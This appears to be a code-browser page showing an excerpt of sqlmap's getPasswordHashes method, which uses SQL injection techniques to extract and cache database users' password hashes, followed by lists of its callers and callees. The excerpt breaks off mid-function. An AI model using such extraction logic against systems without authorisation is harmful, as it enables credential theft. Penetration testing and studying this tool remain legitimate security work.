MCPcopy Index your code
hub / github.com/sqlmapproject/sqlmap / getPasswordHashes

Method getPasswordHashes

plugins/generic/users.py:170–375  ·  view source on GitHub ↗
(self)

Source from the content-addressed store, hash-verified

168 return kb.data.cachedUsers
169
170 def getPasswordHashes(self):
171 infoMsg = "fetching database users password hashes"
172
173 rootQuery = queries[Backend.getIdentifiedDbms()].passwords
174
175 if conf.user == CURRENT_USER:
176 infoMsg += " for current user"
177 conf.user = self.getCurrentUser()
178
179 logger.info(infoMsg)
180
181 if conf.user and Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2):
182 conf.user = conf.user.upper()
183
184 if conf.user:
185 users = conf.user.split(',')
186
187 if Backend.isDbms(DBMS.MYSQL):
188 for user in users:
189 parsedUser = re.search(r"['\"]?(.*?)['\"]?\@", user)
190
191 if parsedUser:
192 users[users.index(user)] = parsedUser.groups()[0]
193 else:
194 users = []
195
196 users = [_ for _ in users if _]
197
198 if any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct:
199 if Backend.isDbms(DBMS.MSSQL) and Backend.isVersionWithin(("2005", "2008")):
200 query = rootQuery.inband.query2
201 else:
202 query = rootQuery.inband.query
203
204 condition = rootQuery.inband.condition
205
206 if conf.user:
207 query += " WHERE "
208 query += " OR ".join("%s = '%s'" % (condition, user) for user in sorted(users))
209
210 if Backend.isDbms(DBMS.SYBASE):
211 getCurrentThreadData().disableStdOut = True
212
213 retVal = pivotDumpTable("(%s) AS %s" % (query, kb.aliasName), ['%s.name' % kb.aliasName, '%s.password' % kb.aliasName], blind=False)
214
215 if retVal:
216 for user, password in filterPairValues(_zip(retVal[0]["%s.name" % kb.aliasName], retVal[0]["%s.password" % kb.aliasName])):
217 if user not in kb.data.cachedUsersPasswords:
218 kb.data.cachedUsersPasswords[user] = [password]
219 else:
220 kb.data.cachedUsersPasswords[user].append(password)
221
222 getCurrentThreadData().disableStdOut = False
223 else:
224 values = inject.getValue(query, blind=False, time=False)
225
226 if Backend.isDbms(DBMS.MSSQL) and isNoneValue(values):
227 values = inject.getValue(query.replace("master.dbo.fn_varbintohexstr", "sys.fn_sqlvarbasetostr"), blind=False, time=False)

Callers 1

actionFunction · 0.45

Calls 15

getCurrentUserMethod · 0.95
getUsersMethod · 0.95
isTechniqueAvailableFunction · 0.90
getCurrentThreadDataFunction · 0.90
pivotDumpTableFunction · 0.90
filterPairValuesFunction · 0.90
isNoneValueFunction · 0.90
isNullValueFunction · 0.90
parsePasswordHashFunction · 0.90
isInferenceAvailableFunction · 0.90
encodeHexFunction · 0.90
unArrayizeValueFunction · 0.90

Tested by

no test coverage detected